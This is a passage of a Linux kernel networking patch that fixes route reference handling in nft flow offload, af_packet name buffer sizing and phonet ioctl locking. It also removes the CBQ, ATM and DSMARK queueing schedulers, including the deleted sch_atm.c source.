+ 		ct->proto.tcp.seen[0].flags |= IP_CT_TCP_FLAG_BE_LIBERAL;
+@@ -361,12 +365,12 @@ static void nft_flow_offload_eval(const struct nft_expr *expr,
+ 	if (ret < 0)
+ 		goto err_flow_add;
+ 
+-	dst_release(route.tuple[!dir].dst);
+ 	return;
+ 
+ err_flow_add:
+ 	flow_offload_free(flow);
+ err_flow_alloc:
++	dst_release(route.tuple[dir].dst);
+ 	dst_release(route.tuple[!dir].dst);
+ err_flow_route:
+ 	clear_bit(IPS_OFFLOAD_BIT, &ct->status);
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 51882f07ef70c..c3117350f5fbb 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -3284,7 +3284,7 @@ static int packet_bind_spkt(struct socket *sock, struct sockaddr *uaddr,
+ 			    int addr_len)
+ {
+ 	struct sock *sk = sock->sk;
+-	char name[sizeof(uaddr->sa_data) + 1];
++	char name[sizeof(uaddr->sa_data_min) + 1];
+ 
+ 	/*
+ 	 *	Check legality
+@@ -3295,8 +3295,8 @@ static int packet_bind_spkt(struct socket *sock, struct sockaddr *uaddr,
+ 	/* uaddr->sa_data comes from the userspace, it's not guaranteed to be
+ 	 * zero-terminated.
+ 	 */
+-	memcpy(name, uaddr->sa_data, sizeof(uaddr->sa_data));
+-	name[sizeof(uaddr->sa_data)] = 0;
++	memcpy(name, uaddr->sa_data, sizeof(uaddr->sa_data_min));
++	name[sizeof(uaddr->sa_data_min)] = 0;
+ 
+ 	return packet_do_bind(sk, name, 0, 0);
+ }
+@@ -3566,11 +3566,11 @@ static int packet_getname_spkt(struct socket *sock, struct sockaddr *uaddr,
+ 		return -EOPNOTSUPP;
+ 
+ 	uaddr->sa_family = AF_PACKET;
+-	memset(uaddr->sa_data, 0, sizeof(uaddr->sa_data));
++	memset(uaddr->sa_data, 0, sizeof(uaddr->sa_data_min));
+ 	rcu_read_lock();
+ 	dev = dev_get_by_index_rcu(sock_net(sk), READ_ONCE(pkt_sk(sk)->ifindex));
+ 	if (dev)
+-		strscpy(uaddr->sa_data, dev->name, sizeof(uaddr->sa_data));
++		strscpy(uaddr->sa_data, dev->name, sizeof(uaddr->sa_data_min));
+ 	rcu_read_unlock();
+ 
+ 	return sizeof(*uaddr);
+diff --git a/net/phonet/datagram.c b/net/phonet/datagram.c
+index ff5f49ab236ed..39a6c5713d0b2 100644
+--- a/net/phonet/datagram.c
++++ b/net/phonet/datagram.c
+@@ -35,10 +35,10 @@ static int pn_ioctl(struct sock *sk, int cmd, unsigned long arg)
+ 
+ 	switch (cmd) {
+ 	case SIOCINQ:
+-		lock_sock(sk);
++		spin_lock_bh(&sk->sk_receive_queue.lock);
+ 		skb = skb_peek(&sk->sk_receive_queue);
+ 		answ = skb ? skb->len : 0;
+-		release_sock(sk);
++		spin_unlock_bh(&sk->sk_receive_queue.lock);
+ 		return put_user(answ, (int __user *)arg);
+ 
+ 	case SIOCPNADDRESOURCE:
+diff --git a/net/phonet/pep.c b/net/phonet/pep.c
+index 83ea13a50690b..607f54c23647a 100644
+--- a/net/phonet/pep.c
++++ b/net/phonet/pep.c
+@@ -917,6 +917,37 @@ static int pep_sock_enable(struct sock *sk, struct sockaddr *addr, int len)
+ 	return 0;
+ }
+ 
++static unsigned int pep_first_packet_length(struct sock *sk)
++{
++	struct pep_sock *pn = pep_sk(sk);
++	struct sk_buff_head *q;
++	struct sk_buff *skb;
++	unsigned int len = 0;
++	bool found = false;
++
++	if (sock_flag(sk, SOCK_URGINLINE)) {
++		q = &pn->ctrlreq_queue;
++		spin_lock_bh(&q->lock);
++		skb = skb_peek(q);
++		if (skb) {
++			len = skb->len;
++			found = true;
++		}
++		spin_unlock_bh(&q->lock);
++	}
++
++	if (likely(!found)) {
++		q = &sk->sk_receive_queue;
++		spin_lock_bh(&q->lock);
++		skb = skb_peek(q);
++		if (skb)
++			len = skb->len;
++		spin_unlock_bh(&q->lock);
++	}
++
++	return len;
++}
++
+ static int pep_ioctl(struct sock *sk, int cmd, unsigned long arg)
+ {
+ 	struct pep_sock *pn = pep_sk(sk);
+@@ -930,15 +961,7 @@ static int pep_ioctl(struct sock *sk, int cmd, unsigned long arg)
+ 			break;
+ 		}
+ 
+-		lock_sock(sk);
+-		if (sock_flag(sk, SOCK_URGINLINE) &&
+-		    !skb_queue_empty(&pn->ctrlreq_queue))
+-			answ = skb_peek(&pn->ctrlreq_queue)->len;
+-		else if (!skb_queue_empty(&sk->sk_receive_queue))
+-			answ = skb_peek(&sk->sk_receive_queue)->len;
+-		else
+-			answ = 0;
+-		release_sock(sk);
++		answ = pep_first_packet_length(sk);
+ 		ret = put_user(answ, (int __user *)arg);
+ 		break;
+ 
+diff --git a/net/sched/Kconfig b/net/sched/Kconfig
+index 24cf0bf7c80e5..9c4a80fce794f 100644
+--- a/net/sched/Kconfig
++++ b/net/sched/Kconfig
+@@ -45,23 +45,6 @@ if NET_SCHED
+ 
+ comment "Queueing/Scheduling"
+ 
+-config NET_SCH_CBQ
+-	tristate "Class Based Queueing (CBQ)"
+-	help
+-	  Say Y here if you want to use the Class-Based Queueing (CBQ) packet
+-	  scheduling algorithm. This algorithm classifies the waiting packets
+-	  into a tree-like hierarchy of classes; the leaves of this tree are
+-	  in turn scheduled by separate algorithms.
+-
+-	  See the top of <file:net/sched/sch_cbq.c> for more details.
+-
+-	  CBQ is a commonly used scheduler, so if you're unsure, you should
+-	  say Y here. Then say Y to all the queueing algorithms below that you
+-	  want to use as leaf disciplines.
+-
+-	  To compile this code as a module, choose M here: the
+-	  module will be called sch_cbq.
+-
+ config NET_SCH_HTB
+ 	tristate "Hierarchical Token Bucket (HTB)"
+ 	help
+@@ -85,20 +68,6 @@ config NET_SCH_HFSC
+ 	  To compile this code as a module, choose M here: the
+ 	  module will be called sch_hfsc.
+ 
+-config NET_SCH_ATM
+-	tristate "ATM Virtual Circuits (ATM)"
+-	depends on ATM
+-	help
+-	  Say Y here if you want to use the ATM pseudo-scheduler.  This
+-	  provides a framework for invoking classifiers, which in turn
+-	  select classes of this queuing discipline.  Each class maps
+-	  the flow(s) it is handling to a given virtual circuit.
+-
+-	  See the top of <file:net/sched/sch_atm.c> for more details.
+-
+-	  To compile this code as a module, choose M here: the
+-	  module will be called sch_atm.
+-
+ config NET_SCH_PRIO
+ 	tristate "Multi Band Priority Queueing (PRIO)"
+ 	help
+@@ -217,17 +186,6 @@ config NET_SCH_GRED
+ 	  To compile this code as a module, choose M here: the
+ 	  module will be called sch_gred.
+ 
+-config NET_SCH_DSMARK
+-	tristate "Differentiated Services marker (DSMARK)"
+-	help
+-	  Say Y if you want to schedule packets according to the
+-	  Differentiated Services architecture proposed in RFC 2475.
+-	  Technical information on this method, with pointers to associated
+-	  RFCs, is available at <http://www.gta.ufrj.br/diffserv/>.
+-
+-	  To compile this code as a module, choose M here: the
+-	  module will be called sch_dsmark.
+-
+ config NET_SCH_NETEM
+ 	tristate "Network emulator (NETEM)"
+ 	help
+diff --git a/net/sched/Makefile b/net/sched/Makefile
+index 8a33a35fc50d5..a66ac1e7b79b5 100644
+--- a/net/sched/Makefile
++++ b/net/sched/Makefile
+@@ -33,20 +33,17 @@ obj-$(CONFIG_NET_ACT_TUNNEL_KEY)+= act_tunnel_key.o
+ obj-$(CONFIG_NET_ACT_CT)	+= act_ct.o
+ obj-$(CONFIG_NET_ACT_GATE)	+= act_gate.o
+ obj-$(CONFIG_NET_SCH_FIFO)	+= sch_fifo.o
+-obj-$(CONFIG_NET_SCH_CBQ)	+= sch_cbq.o
+ obj-$(CONFIG_NET_SCH_HTB)	+= sch_htb.o
+ obj-$(CONFIG_NET_SCH_HFSC)	+= sch_hfsc.o
+ obj-$(CONFIG_NET_SCH_RED)	+= sch_red.o
+ obj-$(CONFIG_NET_SCH_GRED)	+= sch_gred.o
+ obj-$(CONFIG_NET_SCH_INGRESS)	+= sch_ingress.o
+-obj-$(CONFIG_NET_SCH_DSMARK)	+= sch_dsmark.o
+ obj-$(CONFIG_NET_SCH_SFB)	+= sch_sfb.o
+ obj-$(CONFIG_NET_SCH_SFQ)	+= sch_sfq.o
+ obj-$(CONFIG_NET_SCH_TBF)	+= sch_tbf.o
+ obj-$(CONFIG_NET_SCH_TEQL)	+= sch_teql.o
+ obj-$(CONFIG_NET_SCH_PRIO)	+= sch_prio.o
+ obj-$(CONFIG_NET_SCH_MULTIQ)	+= sch_multiq.o
+-obj-$(CONFIG_NET_SCH_ATM)	+= sch_atm.o
+ obj-$(CONFIG_NET_SCH_NETEM)	+= sch_netem.o
+ obj-$(CONFIG_NET_SCH_DRR)	+= sch_drr.o
+ obj-$(CONFIG_NET_SCH_PLUG)	+= sch_plug.o
+diff --git a/net/sched/sch_atm.c b/net/sched/sch_atm.c
+deleted file mode 100644
+index 4a981ca90b0bf..0000000000000
+--- a/net/sched/sch_atm.c
++++ /dev/null
+@@ -1,706 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-only
+-/* net/sched/sch_atm.c - ATM VC selection "queueing discipline" */
+-
+-/* Written 1998-2000 by Werner Almesberger, EPFL ICA */
+-
+-#include <linux/module.h>
+-#include <linux/slab.h>
+-#include <linux/init.h>
+-#include <linux/interrupt.h>
+-#include <linux/string.h>
+-#include <linux/errno.h>
+-#include <linux/skbuff.h>
+-#include <linux/atmdev.h>
+-#include <linux/atmclip.h>
+-#include <linux/rtnetlink.h>
+-#include <linux/file.h>		/* for fput */
+-#include <net/netlink.h>
+-#include <net/pkt_sched.h>
+-#include <net/pkt_cls.h>
+-
+-/*
+- * The ATM queuing discipline provides a framework for invoking classifiers
+- * (aka "filters"), which in turn select classes of this queuing discipline.
+- * Each class maps the flow(s) it is handling to a given VC. Multiple classes
+- * may share the same VC.
+- *
+- * When creating a class, VCs are specified by passing the number of the open
+- * socket descriptor by which the calling process references the VC. The kernel
+- * keeps the VC open at least until all classes using it are removed.
+- *
+- * In this file, most functions are named atm_tc_* to avoid confusion with all
+- * the atm_* in net/atm. This naming convention differs from what's used in the
+- * rest of net/sched.
+- *
+- * Known bugs:
+- *  - sometimes messes up the IP stack
+- *  - any manipulations besides the few operations described in the README, are
+- *    untested and likely to crash the system
+- *  - should lock the flow while there is data in the queue (?)
+- */
+-
+-#define VCC2FLOW(vcc) ((struct atm_flow_data *) ((vcc)->user_back))
+-
+-struct atm_flow_data {
+-	struct Qdisc_class_common common;
+-	struct Qdisc		*q;	/* FIFO, TBF, etc. */
+-	struct tcf_proto __rcu	*filter_list;
+-	struct tcf_block	*block;
+-	struct atm_vcc		*vcc;	/* VCC; NULL if VCC is closed */
+-	void			(*old_pop)(struct atm_vcc *vcc,
+-					   struct sk_buff *skb); /* chaining */
+-	struct atm_qdisc_data	*parent;	/* parent qdisc */
+-	struct socket		*sock;		/* for closing */
+-	int			ref;		/* reference count */
+-	struct gnet_stats_basic_sync	bstats;
+-	struct gnet_stats_queue	qstats;
+-	struct list_head	list;
+-	struct atm_flow_data	*excess;	/* flow for excess traffic;
+-						   NULL to set CLP instead */
+-	int			hdr_len;
+-	unsigned char		hdr[];		/* header data; MUST BE LAST */
+-};
+-
+-struct atm_qdisc_data {
+-	struct atm_flow_data	link;		/* unclassified skbs go here */
+-	struct list_head	flows;		/* NB: "link" is also on this
+-						   list */
+-	struct tasklet_struct	task;		/* dequeue tasklet */
+-};
+-
+-/* ------------------------- Class/flow operations ------------------------- */
+-
+-static inline struct atm_flow_data *lookup_flow(struct Qdisc *sch, u32 classid)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow;
+-
+-	list_for_each_entry(flow, &p->flows, list) {
+-		if (flow->common.classid == classid)
+-			return flow;
+-	}
+-	return NULL;
+-}
+-
+-static int atm_tc_graft(struct Qdisc *sch, unsigned long arg,
+-			struct Qdisc *new, struct Qdisc **old,
+-			struct netlink_ext_ack *extack)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow = (struct atm_flow_data *)arg;
+-
+-	pr_debug("atm_tc_graft(sch %p,[qdisc %p],flow %p,new %p,old %p)\n",
+-		sch, p, flow, new, old);
+-	if (list_empty(&flow->list))
+-		return -EINVAL;
+-	if (!new)
+-		new = &noop_qdisc;
+-	*old = flow->q;
+-	flow->q = new;
+-	if (*old)
+-		qdisc_reset(*old);
+-	return 0;
+-}
+-
+-static struct Qdisc *atm_tc_leaf(struct Qdisc *sch, unsigned long cl)
+-{
+-	struct atm_flow_data *flow = (struct atm_flow_data *)cl;
+-
+-	pr_debug("atm_tc_leaf(sch %p,flow %p)\n", sch, flow);
+-	return flow ? flow->q : NULL;
+-}
+-
+-static unsigned long atm_tc_find(struct Qdisc *sch, u32 classid)
+-{
+-	struct atm_qdisc_data *p __maybe_unused = qdisc_priv(sch);
+-	struct atm_flow_data *flow;
+-
+-	pr_debug("%s(sch %p,[qdisc %p],classid %x)\n", __func__, sch, p, classid);
+-	flow = lookup_flow(sch, classid);
+-	pr_debug("%s: flow %p\n", __func__, flow);
+-	return (unsigned long)flow;
+-}
+-
+-static unsigned long atm_tc_bind_filter(struct Qdisc *sch,
+-					unsigned long parent, u32 classid)
+-{
+-	struct atm_qdisc_data *p __maybe_unused = qdisc_priv(sch);
+-	struct atm_flow_data *flow;
+-
+-	pr_debug("%s(sch %p,[qdisc %p],classid %x)\n", __func__, sch, p, classid);
+-	flow = lookup_flow(sch, classid);
+-	if (flow)
+-		flow->ref++;
+-	pr_debug("%s: flow %p\n", __func__, flow);
+-	return (unsigned long)flow;
+-}
+-
+-/*
+- * atm_tc_put handles all destructions, including the ones that are explicitly
+- * requested (atm_tc_destroy, etc.). The assumption here is that we never drop
+- * anything that still seems to be in use.
+- */
+-static void atm_tc_put(struct Qdisc *sch, unsigned long cl)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow = (struct atm_flow_data *)cl;
+-
+-	pr_debug("atm_tc_put(sch %p,[qdisc %p],flow %p)\n", sch, p, flow);
+-	if (--flow->ref)
+-		return;
+-	pr_debug("atm_tc_put: destroying\n");
+-	list_del_init(&flow->list);
+-	pr_debug("atm_tc_put: qdisc %p\n", flow->q);
+-	qdisc_put(flow->q);
+-	tcf_block_put(flow->block);
+-	if (flow->sock) {
+-		pr_debug("atm_tc_put: f_count %ld\n",
+-			file_count(flow->sock->file));
+-		flow->vcc->pop = flow->old_pop;
+-		sockfd_put(flow->sock);
+-	}
+-	if (flow->excess)
+-		atm_tc_put(sch, (unsigned long)flow->excess);
+-	if (flow != &p->link)
+-		kfree(flow);
+-	/*
+-	 * If flow == &p->link, the qdisc no longer works at this point and
+-	 * needs to be removed. (By the caller of atm_tc_put.)
+-	 */
+-}
+-
+-static void sch_atm_pop(struct atm_vcc *vcc, struct sk_buff *skb)
+-{
+-	struct atm_qdisc_data *p = VCC2FLOW(vcc)->parent;
+-
+-	pr_debug("sch_atm_pop(vcc %p,skb %p,[qdisc %p])\n", vcc, skb, p);
+-	VCC2FLOW(vcc)->old_pop(vcc, skb);
+-	tasklet_schedule(&p->task);
+-}
+-
+-static const u8 llc_oui_ip[] = {
+-	0xaa,			/* DSAP: non-ISO */
+-	0xaa,			/* SSAP: non-ISO */
+-	0x03,			/* Ctrl: Unnumbered Information Command PDU */
+-	0x00,			/* OUI: EtherType */
+-	0x00, 0x00,
+-	0x08, 0x00
+-};				/* Ethertype IP (0800) */
+-
+-static const struct nla_policy atm_policy[TCA_ATM_MAX + 1] = {
+-	[TCA_ATM_FD]		= { .type = NLA_U32 },
+-	[TCA_ATM_EXCESS]	= { .type = NLA_U32 },
+-};
+-
+-static int atm_tc_change(struct Qdisc *sch, u32 classid, u32 parent,
+-			 struct nlattr **tca, unsigned long *arg,
+-			 struct netlink_ext_ack *extack)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow = (struct atm_flow_data *)*arg;
+-	struct atm_flow_data *excess = NULL;
+-	struct nlattr *opt = tca[TCA_OPTIONS];
+-	struct nlattr *tb[TCA_ATM_MAX + 1];
+-	struct socket *sock;
+-	int fd, error, hdr_len;
+-	void *hdr;
+-
+-	pr_debug("atm_tc_change(sch %p,[qdisc %p],classid %x,parent %x,"
+-		"flow %p,opt %p)\n", sch, p, classid, parent, flow, opt);
+-	/*
+-	 * The concept of parents doesn't apply for this qdisc.
+-	 */
+-	if (parent && parent != TC_H_ROOT && parent != sch->handle)
+-		return -EINVAL;
+-	/*
+-	 * ATM classes cannot be changed. In order to change properties of the
+-	 * ATM connection, that socket needs to be modified directly (via the
+-	 * native ATM API. In order to send a flow to a different VC, the old
+-	 * class needs to be removed and a new one added. (This may be changed
+-	 * later.)
+-	 */
+-	if (flow)
+-		return -EBUSY;
+-	if (opt == NULL)
+-		return -EINVAL;
+-
+-	error = nla_parse_nested_deprecated(tb, TCA_ATM_MAX, opt, atm_policy,
+-					    NULL);
+-	if (error < 0)
+-		return error;
+-
+-	if (!tb[TCA_ATM_FD])
+-		return -EINVAL;
+-	fd = nla_get_u32(tb[TCA_ATM_FD]);
+-	pr_debug("atm_tc_change: fd %d\n", fd);
+-	if (tb[TCA_ATM_HDR]) {
+-		hdr_len = nla_len(tb[TCA_ATM_HDR]);
+-		hdr = nla_data(tb[TCA_ATM_HDR]);
+-	} else {
+-		hdr_len = RFC1483LLC_LEN;
+-		hdr = NULL;	/* default LLC/SNAP for IP */
+-	}
+-	if (!tb[TCA_ATM_EXCESS])
+-		excess = NULL;
+-	else {
+-		excess = (struct atm_flow_data *)
+-			atm_tc_find(sch, nla_get_u32(tb[TCA_ATM_EXCESS]));
+-		if (!excess)
+-			return -ENOENT;
+-	}
+-	pr_debug("atm_tc_change: type %d, payload %d, hdr_len %d\n",
+-		 opt->nla_type, nla_len(opt), hdr_len);
+-	sock = sockfd_lookup(fd, &error);
+-	if (!sock)
+-		return error;	/* f_count++ */
+-	pr_debug("atm_tc_change: f_count %ld\n", file_count(sock->file));
+-	if (sock->ops->family != PF_ATMSVC && sock->ops->family != PF_ATMPVC) {
+-		error = -EPROTOTYPE;
+-		goto err_out;
+-	}
+-	/* @@@ should check if the socket is really operational or we'll crash
+-	   on vcc->send */
+-	if (classid) {
+-		if (TC_H_MAJ(classid ^ sch->handle)) {
+-			pr_debug("atm_tc_change: classid mismatch\n");
+-			error = -EINVAL;
+-			goto err_out;
+-		}
+-	} else {
+-		int i;
+-		unsigned long cl;
+-
+-		for (i = 1; i < 0x8000; i++) {
+-			classid = TC_H_MAKE(sch->handle, 0x8000 | i);
+-			cl = atm_tc_find(sch, classid);
+-			if (!cl)
+-				break;
+-		}
+-	}
+-	pr_debug("atm_tc_change: new id %x\n", classid);
+-	flow = kzalloc(sizeof(struct atm_flow_data) + hdr_len, GFP_KERNEL);
+-	pr_debug("atm_tc_change: flow %p\n", flow);
+-	if (!flow) {
+-		error = -ENOBUFS;
+-		goto err_out;
+-	}
+-
+-	error = tcf_block_get(&flow->block, &flow->filter_list, sch,
+-			      extack);
+-	if (error) {
+-		kfree(flow);
+-		goto err_out;
+-	}
+-
+-	flow->q = qdisc_create_dflt(sch->dev_queue, &pfifo_qdisc_ops, classid,
+-				    extack);
+-	if (!flow->q)
+-		flow->q = &noop_qdisc;
+-	pr_debug("atm_tc_change: qdisc %p\n", flow->q);
+-	flow->sock = sock;
+-	flow->vcc = ATM_SD(sock);	/* speedup */
+-	flow->vcc->user_back = flow;
+-	pr_debug("atm_tc_change: vcc %p\n", flow->vcc);
+-	flow->old_pop = flow->vcc->pop;
+-	flow->parent = p;
+-	flow->vcc->pop = sch_atm_pop;
+-	flow->common.classid = classid;
+-	flow->ref = 1;
+-	flow->excess = excess;
+-	list_add(&flow->list, &p->link.list);
+-	flow->hdr_len = hdr_len;
+-	if (hdr)
+-		memcpy(flow->hdr, hdr, hdr_len);
+-	else
+-		memcpy(flow->hdr, llc_oui_ip, sizeof(llc_oui_ip));
+-	*arg = (unsigned long)flow;
+-	return 0;
+-err_out:
+-	sockfd_put(sock);
+-	return error;
+-}
+-
+-static int atm_tc_delete(struct Qdisc *sch, unsigned long arg,
+-			 struct netlink_ext_ack *extack)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow = (struct atm_flow_data *)arg;
+-
+-	pr_debug("atm_tc_delete(sch %p,[qdisc %p],flow %p)\n", sch, p, flow);
+-	if (list_empty(&flow->list))
+-		return -EINVAL;
+-	if (rcu_access_pointer(flow->filter_list) || flow == &p->link)
+-		return -EBUSY;
+-	/*
+-	 * Reference count must be 2: one for "keepalive" (set at class
+-	 * creation), and one for the reference held when calling delete.
+-	 */
+-	if (flow->ref < 2) {
+-		pr_err("atm_tc_delete: flow->ref == %d\n", flow->ref);
+-		return -EINVAL;
+-	}
+-	if (flow->ref > 2)
+-		return -EBUSY;	/* catch references via excess, etc. */
+-	atm_tc_put(sch, arg);
+-	return 0;
+-}
+-
+-static void atm_tc_walk(struct Qdisc *sch, struct qdisc_walker *walker)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow;
+-
+-	pr_debug("atm_tc_walk(sch %p,[qdisc %p],walker %p)\n", sch, p, walker);
+-	if (walker->stop)
+-		return;
+-	list_for_each_entry(flow, &p->flows, list) {
+-		if (!tc_qdisc_stats_dump(sch, (unsigned long)flow, walker))
+-			break;
+-	}
+-}
+-
+-static struct tcf_block *atm_tc_tcf_block(struct Qdisc *sch, unsigned long cl,
+-					  struct netlink_ext_ack *extack)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow = (struct atm_flow_data *)cl;
+-
+-	pr_debug("atm_tc_find_tcf(sch %p,[qdisc %p],flow %p)\n", sch, p, flow);
+-	return flow ? flow->block : p->link.block;
+-}
+-
+-/* --------------------------- Qdisc operations ---------------------------- */
+-
+-static int atm_tc_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+-			  struct sk_buff **to_free)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow;
+-	struct tcf_result res;
+-	int result;
+-	int ret = NET_XMIT_SUCCESS | __NET_XMIT_BYPASS;
+-
+-	pr_debug("atm_tc_enqueue(skb %p,sch %p,[qdisc %p])\n", skb, sch, p);
+-	result = TC_ACT_OK;	/* be nice to gcc */
+-	flow = NULL;
+-	if (TC_H_MAJ(skb->priority) != sch->handle ||
+-	    !(flow = (struct atm_flow_data *)atm_tc_find(sch, skb->priority))) {
+-		struct tcf_proto *fl;
+-
+-		list_for_each_entry(flow, &p->flows, list) {
+-			fl = rcu_dereference_bh(flow->filter_list);
+-			if (fl) {
+-				result = tcf_classify(skb, NULL, fl, &res, true);
+-				if (result < 0)
+-					continue;
+-				if (result == TC_ACT_SHOT)
+-					goto done;
+-
+-				flow = (struct atm_flow_data *)res.class;
+-				if (!flow)
+-					flow = lookup_flow(sch, res.classid);
+-				goto drop;
+-			}
+-		}
+-		flow = NULL;
+-done:
+-		;
+-	}
+-	if (!flow) {
+-		flow = &p->link;
+-	} else {
+-		if (flow->vcc)
+-			ATM_SKB(skb)->atm_options = flow->vcc->atm_options;
+-		/*@@@ looks good ... but it's not supposed to work :-) */
+-#ifdef CONFIG_NET_CLS_ACT
+-		switch (result) {
+-		case TC_ACT_QUEUED:
+-		case TC_ACT_STOLEN:
+-		case TC_ACT_TRAP:
+-			__qdisc_drop(skb, to_free);
+-			return NET_XMIT_SUCCESS | __NET_XMIT_STOLEN;
+-		case TC_ACT_SHOT:
+-			__qdisc_drop(skb, to_free);
+-			goto drop;
+-		case TC_ACT_RECLASSIFY:
+-			if (flow->excess)
+-				flow = flow->excess;
+-			else
+-				ATM_SKB(skb)->atm_options |= ATM_ATMOPT_CLP;
+-			break;
+-		}
+-#endif
+-	}
+-
+-	ret = qdisc_enqueue(skb, flow->q, to_free);
+-	if (ret != NET_XMIT_SUCCESS) {
+-drop: __maybe_unused
+-		if (net_xmit_drop_count(ret)) {
+-			qdisc_qstats_drop(sch);
+-			if (flow)
+-				flow->qstats.drops++;
+-		}
+-		return ret;
+-	}
+-	/*
+-	 * Okay, this may seem weird. We pretend we've dropped the packet if
+-	 * it goes via ATM. The reason for this is that the outer qdisc
+-	 * expects to be able to q->dequeue the packet later on if we return
+-	 * success at this place. Also, sch->q.qdisc needs to reflect whether
+-	 * there is a packet egligible for dequeuing or not. Note that the
+-	 * statistics of the outer qdisc are necessarily wrong because of all
+-	 * this. There's currently no correct solution for this.
+-	 */
+-	if (flow == &p->link) {
+-		sch->q.qlen++;
+-		return NET_XMIT_SUCCESS;
+-	}
+-	tasklet_schedule(&p->task);
+-	return NET_XMIT_SUCCESS | __NET_XMIT_BYPASS;
+-}
+-
+-/*
+- * Dequeue packets and send them over ATM. Note that we quite deliberately
+- * avoid checking net_device's flow control here, simply because sch_atm
+- * uses its own channels, which have nothing to do with any CLIP/LANE/or
+- * non-ATM interfaces.
+- */
+-
+-static void sch_atm_dequeue(struct tasklet_struct *t)
+-{
+-	struct atm_qdisc_data *p = from_tasklet(p, t, task);
+-	struct Qdisc *sch = qdisc_from_priv(p);
+-	struct atm_flow_data *flow;
+-	struct sk_buff *skb;
+-
+-	pr_debug("sch_atm_dequeue(sch %p,[qdisc %p])\n", sch, p);
+-	list_for_each_entry(flow, &p->flows, list) {
+-		if (flow == &p->link)
+-			continue;
+-		/*
+-		 * If traffic is properly shaped, this won't generate nasty
+-		 * little bursts. Otherwise, it may ... (but that's okay)
+-		 */
+-		while ((skb = flow->q->ops->peek(flow->q))) {
+-			if (!atm_may_send(flow->vcc, skb->truesize))
+-				break;
+-
+-			skb = qdisc_dequeue_peeked(flow->q);
+-			if (unlikely(!skb))
+-				break;
+-
+-			qdisc_bstats_update(sch, skb);
+-			bstats_update(&flow->bstats, skb);
+-			pr_debug("atm_tc_dequeue: sending on class %p\n", flow);
+-			/* remove any LL header somebody else has attached */
+-			skb_pull(skb, skb_network_offset(skb));
+-			if (skb_headroom(skb) < flow->hdr_len) {
+-				struct sk_buff *new;
+-
+-				new = skb_realloc_headroom(skb, flow->hdr_len);
+-				dev_kfree_skb(skb);
+-				if (!new)
+-					continue;
+-				skb = new;
+-			}
+-			pr_debug("sch_atm_dequeue: ip %p, data %p\n",
+-				 skb_network_header(skb), skb->data);
+-			ATM_SKB(skb)->vcc = flow->vcc;
+-			memcpy(skb_push(skb, flow->hdr_len), flow->hdr,
+-			       flow->hdr_len);
+-			refcount_add(skb->truesize,
+-				   &sk_atm(flow->vcc)->sk_wmem_alloc);
+-			/* atm.atm_options are already set by atm_tc_enqueue */
+-			flow->vcc->send(flow->vcc, skb);
+-		}
+-	}
+-}
+-
+-static struct sk_buff *atm_tc_dequeue(struct Qdisc *sch)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct sk_buff *skb;
+-
+-	pr_debug("atm_tc_dequeue(sch %p,[qdisc %p])\n", sch, p);
+-	tasklet_schedule(&p->task);
+-	skb = qdisc_dequeue_peeked(p->link.q);
+-	if (skb)
+-		sch->q.qlen--;
+-	return skb;
+-}
+-
+-static struct sk_buff *atm_tc_peek(struct Qdisc *sch)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-
+-	pr_debug("atm_tc_peek(sch %p,[qdisc %p])\n", sch, p);
+-
+-	return p->link.q->ops->peek(p->link.q);
+-}
+-
+-static int atm_tc_init(struct Qdisc *sch, struct nlattr *opt,
+-		       struct netlink_ext_ack *extack)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	int err;
+-
+-	pr_debug("atm_tc_init(sch %p,[qdisc %p],opt %p)\n", sch, p, opt);
+-	INIT_LIST_HEAD(&p->flows);
+-	INIT_LIST_HEAD(&p->link.list);
+-	gnet_stats_basic_sync_init(&p->link.bstats);
+-	list_add(&p->link.list, &p->flows);
+-	p->link.q = qdisc_create_dflt(sch->dev_queue,
+-				      &pfifo_qdisc_ops, sch->handle, extack);
+-	if (!p->link.q)
+-		p->link.q = &noop_qdisc;
+-	pr_debug("atm_tc_init: link (%p) qdisc %p\n", &p->link, p->link.q);
+-	p->link.vcc = NULL;
+-	p->link.sock = NULL;
+-	p->link.common.classid = sch->handle;
+-	p->link.ref = 1;
+-
+-	err = tcf_block_get(&p->link.block, &p->link.filter_list, sch,
+-			    extack);
+-	if (err)
+-		return err;
+-
+-	tasklet_setup(&p->task, sch_atm_dequeue);
+-	return 0;
+-}
+-
+-static void atm_tc_reset(struct Qdisc *sch)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow;
+-
+-	pr_debug("atm_tc_reset(sch %p,[qdisc %p])\n", sch, p);
+-	list_for_each_entry(flow, &p->flows, list)
+-		qdisc_reset(flow->q);
+-}
+-
+-static void atm_tc_destroy(struct Qdisc *sch)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
+-	struct atm_flow_data *flow, *tmp;
+-
+-	pr_debug("atm_tc_destroy(sch %p,[qdisc %p])\n", sch, p);
+-	list_for_each_entry(flow, &p->flows, list) {
+-		tcf_block_put(flow->block);
+-		flow->block = NULL;
+-	}
+-
+-	list_for_each_entry_safe(flow, tmp, &p->flows, list) {
+-		if (flow->ref > 1)
+-			pr_err("atm_destroy: %p->ref = %d\n", flow, flow->ref);
+-		atm_tc_put(sch, (unsigned long)flow);
+-	}
+-	tasklet_kill(&p->task);
+-}
+-
+-static int atm_tc_dump_class(struct Qdisc *sch, unsigned long cl,
+-			     struct sk_buff *skb, struct tcmsg *tcm)
+-{
+-	struct atm_qdisc_data *p = qdisc_priv(sch);
